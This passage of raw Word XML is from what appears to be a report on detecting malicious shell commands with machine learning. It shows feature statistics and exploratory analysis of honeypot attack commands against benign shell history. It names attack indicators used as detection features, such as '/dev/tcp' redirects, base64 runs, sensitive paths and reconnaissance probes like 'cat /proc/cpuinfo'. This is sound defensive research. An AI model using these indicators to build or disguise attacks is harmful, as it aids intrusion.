              <w:t>n_sensitive_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_redirect_out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variance gap is a measure of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>spread</w:t>
      </w:r>
      <w:r>
        <w:t>, not of separation, and the rank-biserial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>effect sizes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_d1_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:t>, and the same statistics in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_feature_justification.csv</w:t>
      </w:r>
      <w:r>
        <w:t>) reorder the table decisively. On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1, 41 of the 43 features separate the classes at p &lt; 0.05, but only six</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reach |r| ≥ 0.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.452), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.318),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.303), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.247), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.238), and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.229). The two that fail the significance test are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_long_flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (p = 0.081) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_private_ip</w:t>
      </w:r>
      <w:r>
        <w:t>, which is essentially inert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>here (r ≈ 0, prevalence 0.0007 in both classes) and earns its place in the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">feature set on Dataset 2 rather than this one. Note the crossings: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ranks eighth by variance gap and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by effect, while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leads the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>gap table and places only fourth by effect — spread and signal are not the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quantity, which is the theme of the takeaways below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three takeaways shape the downstream model design. First, the top of the gap ranking is an artifact of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not necessarily of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> win the variance contest largely because they are measured in raw character units. The cleanest counter-example is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which ranks 41st of 43 by variance gap and second by effect size — its entire signal lives inside a [0,1] band that the variance chart cannot show. Any distance-, linear-, or neural-based learner will be dominated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t>'s magnitude unless these features are standardized or log-transformed, whereas the bounded ratio features (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) already encode obfuscation without the scale baggage; that is the argument for the in-pipeline standardization described in Chapter 5.3, and it is why the feature audit dropped both entropy features as cluster-redundant rather than keeping a third scale-free proxy — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was cut in favour of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>token_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in favour of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_feature_decisions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows 121–122). Second, expect heavy dual-use overlap: pipes, redirects, and privilege escalation are the daily vocabulary of legitimate administration, so no single feature cleanly partitions the classes. The sharpest evidence is directional — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>benign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> even on this curated corpus (attack mean 0.311 vs benign 0.557, r = −0.166), as do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_lotl</w:t>
      </w:r>
      <w:r>
        <w:t>; the mere presence of LotL vocabulary is an anti-signal on both datasets, and Chapter 3's Dataset 2 analysis shows the same signs more strongly still. This is exactly why the length probe collapses to 0.611, and the correlation heatmap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_corr_heatmap_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) shows why redundancy compounds it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are collinear at 0.897 because they largely re-measure "how big is this command", and a second, non-size duplication runs through the presence-versus-head pairs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_lotl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at 0.871, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_interp_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_interp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at 0.685). The model must earn its lift from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>conjunctions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a long token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a base64 run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> redirect — not from any feature in isolation. Third, character count is real-but-insufficient by design: keep it as a cheap weak learner and a useful split variable for tree ensembles, but do not mistake its large variance gap for separating power. The distributional overlap in the 20–50 character body is the ceiling on what size alone can deliver, and closing that gap is the job of the path, network, and obfuscation features — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> above all — rather than the shape features.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 3 — Exploratory Data Analysis Findings (Dataset 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2 is the operational counterpart to Dataset 1's curated corpus: 7,661</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>training commands at the same engineered 1:3 attack:benign prevalence, where</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>every one of the 1,915 attacks is a command really typed (or scripted) by an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attacker into a Cowrie SSH honeypot, and the 5,746 benign commands are real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">usage — 4,001 lines of practitioner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plus 1,745 commandlinefu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>one-liners. The command-length histogram (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_length_hist_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>density-normalized, clipped at the 99th percentile) immediately breaks the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">headline regularity of Dataset 1: here the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>benign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands are longer on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">average (mean 42.0 characters, median 27) than the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mean 36.8,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>median 21). What attacks have instead is dispersion — attack length variance is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>11,780 versus 1,822 benign (6.5×), the attack p99 reaches 278 characters against</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>224 benign, and the single longest command in the corpus is a 3,450-character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attack payload against a benign maximum of 350. The distribution shape explains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the mechanism: honeypot traffic is dominated by short scripted fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>probes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat /proc/cpuinfo</w:t>
      </w:r>
      <w:r>
        <w:t>-style one-liners produce the sharp spike</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>at ~10 characters) punctuated by rare, enormous dropper payloads (the clipped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mass at the right edge of the figure). A length-alone probe now scores **AUC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.415** on the train split (0.43 on the held-out test) — not merely weak, as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>its 0.611 on Dataset 1's holdout was, but *below chance in the direction that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>worked on Dataset 1*. The "attacks are longer" rule learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>from curated PoC one-liners is answered by live traffic with the opposite sign,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and this single reversal is the cleanest preview of the cross-dataset transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>collapse quantified in Chapter 8.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The per-feature evidence (all 43 features: Mann-Whitney U with rank-biserial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">effect sizes in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_d2_feature_stats.csv</w:t>
      </w:r>
      <w:r>
        <w:t>; top-15 variance gaps in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_variance_by_label_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t>) shows discrimination survives on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>operational data but changes both magnitude and character. 35 of 43 features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>separate the classes significantly (p &lt; 0.05), yet the strongest effect is only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>r = +0.234 — far below Dataset 1's leading effects — so Dataset 2 offers many</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>weak, partially redundant signals rather than a few strong ones. The profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that emerges from the attack-leaning side is that of the automated botnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dropper: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leads (attack mean 0.083 vs 0.037 benign; a standalone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>AUC of 0.617 — IP addresses, ports, hex identifiers, and numbered payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
